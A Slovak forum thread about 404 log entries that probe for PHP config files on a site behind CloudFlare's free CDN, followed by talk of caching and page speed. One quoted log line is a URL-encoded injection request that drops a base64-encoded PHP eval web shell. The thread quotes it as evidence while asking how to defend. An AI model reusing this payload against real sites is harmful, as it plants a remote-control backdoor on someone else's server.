CloudFlare je privelmi "zvedavy"

[lepermessiah]

Caute,

nestretli ste sa s problemom, ze mate free CDN u CloudFlare a ten vam lozi po stranke a vyslovene sa snazi najst nejaky backdoor ? Sem-tam kontrolujem 404 logy na jednom webe co spravujem a odkedy je tam to CDN (stranka je uzasne rychla) sa objavuju "nenajdene" stranky, napriklad:

• /configuration.php
  /configbak.php
  /mysql.php
  /load-config.php
  /.joomla.system.php
  /.config.php
  /wp-settings.php
  /webconfig.txt.php
  /.cpanel_config.php
  /administrator?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B

..a dalo by sa pokracovat. Web nebezi na ziadnom CMS, cize sa neobavam toho, ze by raz nejaky backdoor nasli, no zaujimalo by ma, preco sa o to snazia a ci sa voci tomu da nejako branit (pri zachovani free CDN)
PS: vsetky nenajdene stranky (resp. subory) su vyhladavane 99% z IPciek CloudFlare ako 173.245.55.71 a 199.27.133.165

[Chris]

ja som ho pouzival ale nijako som podla testov nevidel rozdiel tak som zrusil.

Aj kvoli tomu ze tam nefungoval spravne tapatalk s kunenou ak bolo CDN zapnute.

NGINX so spravne nastavenou cache will do the job

[lepermessiah]

tak v tomto pripade si o NGINX mozem len snivat

z testov je to zhruba o 40% rychlejsie, je to staticke, caching v htaccess snad nastaveny dobre, no je tam vela malych obrazkov - 38% obsahu a html tvori 50%, cize chapeme ze to nie je nic velke, no ten CDN tam robi zazraky, preto by som ho nechcel odstavit

[Chris]

hod sem porovnanie so zapnutym a vypnutym CDN

napr. z

https://gtmetrix.com/

[lepermessiah]

ved prave GTMetrix pouzivam aj ja, od toho sa odrazam, ze to funguje realne (a tiez pocitovo na pocitaci/mobile to loaduje ovela rychlejsie), nacitavanie bolo cca 1.5s a s CDN 1.1s, velkost stranky si nepamatam, nieco okolo 230kb ..

[shiro]

Skorej by som riesil podstatu celeho tohoto cirkusu, a sice:

mate free CDN u CloudFlare a ten vam lozi po stranke a vyslovene sa snazi najst nejaky backdoor ?

...co je na tom akoze zle a preco to vobec dakomu vadi?
Obzvlast ked vieme co za ludi bezne weby programuje a kolko dier tam byva? Mali by ste byt este vdacni ze dakto to robi zadara aspon nejako...

[faugusztin]

S Cloudflare to ma spolocne akurat to, ze si sa stal "zaujimavym cielom" v momente ked si presiel pod Cloudflare. Samo o sebe tie query oni nerobia. A kedze cloudflare cachuje tvoje stranky, tak VZDY budes mat IP v logoch z adries CF.

[lepermessiah]

aha, takto som sa na to nepozeral diki faugusztin

@shiro no vadi to mne, lebo za tyzden to spravi 12MB log a hosting ma len 50MB a vypnut by som to nerad, kedze to obcas aj pomoze s identifikovanim problemu ako stratene obrazky a tak ..